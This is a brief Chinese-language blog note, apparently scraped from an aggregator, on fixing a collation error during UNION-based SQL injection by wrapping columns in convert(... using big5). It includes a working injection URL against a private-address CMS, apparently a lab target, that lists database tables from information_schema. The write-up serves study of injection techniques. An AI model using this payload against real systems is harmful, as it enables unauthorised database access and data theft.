1. 程式人生 > >sql註入記錄------類型轉換錯誤---convert()函數

sql註入記錄------類型轉換錯誤---convert()函數

png HP 類型 group .com 技術分享 出現 sql註入 convert

sql註入在聯合查詢是出現一下錯誤查不到數據

Illegal mix of collations for operation ‘UNION‘

技術分享圖片

用convert() 轉換編碼為utf8 或者big5 就可以了

http://10.1.2.5:52843/wcms/show.php?id=-33 union all SELECT 1,2,3,4,5,6,7,8,9,10,convert(group_concat(table_name) using big5),12,13,14,15 from information_schema.tables where table_schema=‘cms‘

sql註入記錄------類型轉換錯誤---convert()函數